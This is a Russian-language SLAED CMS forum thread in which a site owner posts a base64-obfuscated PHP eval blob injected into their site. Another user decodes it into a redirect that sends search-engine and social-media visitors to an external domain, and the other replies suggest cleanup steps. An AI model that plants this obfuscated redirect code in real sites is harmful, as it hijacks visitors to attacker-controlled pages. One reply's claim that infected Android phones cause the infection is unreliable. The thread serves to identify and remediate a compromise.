Чтение RSS каналов

Форум

Открыть Ответить

вставили вредоносный код

0

0
1
13.12.2012 12:12:4314.12.2012 17:15:42
eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwogJHFhenBsbT1oZWFkZXJzX3Nl
bnQoKTsKaWYgKCEkcWF6cGxtKXsKICRyZWZlcmVyPSRfU0VSVkV
SWydIVFRQX1JFRkVSRVInXTsKJHVhZz0kX1NFUlZFUlsnSFRUUF9VU
0VSX0FHRU5UJ107CiBpZiAoJHVhZykgewppZiAoc3RyaXN0cigkcmV
mZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyK
CRyZWZ
lcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkc
mVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKC
RyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdH
Jpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSB
vciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb
3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzd
HIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpd
C5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcm
VmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmN
vbSIpI
G9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZm
FjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CiBpZiAoIXN0cmlz
dHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewogaGVhZG
VyKCJMb2NhdGlvbjogaHR0cDovL2JyZWFraW5nYmFkLm9zYS5wbC8iKTsKIGV4aXQoKTsKIH0KIH0KfQoJfQ=="));


Что это?


Версия системы: SLAED CMS 4.* Pro
Версия PHP: PHP 5
Сервер: Сервер в интернете
2.95

2.95
2
13.12.2012 13:55:17
Такая же фигня была-Все js файлы заражены.

1 ПЕрезалей js - файлы
2 Смени пароль от фтп

Но самое главное проверь комп на наличие вирусов.
3.75

3.75
3
13.12.2012 15:37:05
error_reporting(0);
 $qazplm=headers_sent();
if (!$qazplm){
 $referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
 if ($uag) {
if (stristr($referer,"yandex") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"baidu.com") or stristr($referer,"doubleclick.net") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"***.com") or stristr($referer,"clickbank.net") or stristr($referer,"blogspot.com") or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
 if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
 header("Location: http://breakingbad.osa.pl/");
 exit();
 }
 }
}
	}

Расшифровка...


Версия системы: SLAED CMS 5.* Pro
Версия PHP: PHP 5
Сервер: Сервер в интернете
3.71

3.71
4
13.12.2012 18:35:40
Проверте Все файлы htaccess, угроза идет от смартфонов и планшетов под Андроид, которые имеют вирус и заходят на ваш сайт. Проблема серьезная, сам столкнулся, в сети мало инфо по этому поводу. Но мое мнение, что вирус лезет черех сервер хостера.


Версия системы: Open SLAED 1.*
Версия PHP: PHP 5
Сервер: Сервер в интернете
4

4
5
14.12.2012 17:17:58
Рекомендую
1. Обновить систему до актуальной версии.
2. Удалить редактор spaw2.

О сколько нам открытий чудных,
Готовит просвещенья дух,
И опыт, сын ошибок трудных,
И гений, парадоксов друг...
3.22

3.22
6
15.12.2012 22:45:16
спасибо всем
2.95

2.95
7
27.12.2012 09:15:02
Тоже в свое время задавался аналогичным вопросом! Ответ как всегда нашел здесь! Спасибо!!!
3.66

3.66
Открыть Ответить
Хотите опробовать SLAED CMS в действии?

Технологии

PHP MySQL HTML 5 CSS 3 jQuery jQuery UI

Контакты

  • D-49179, Deutschland
    Ostercappeln, Im Siek 6
  • +49 176 61966679

  • https://slaed.net
Идеи и предложения
Обратная связь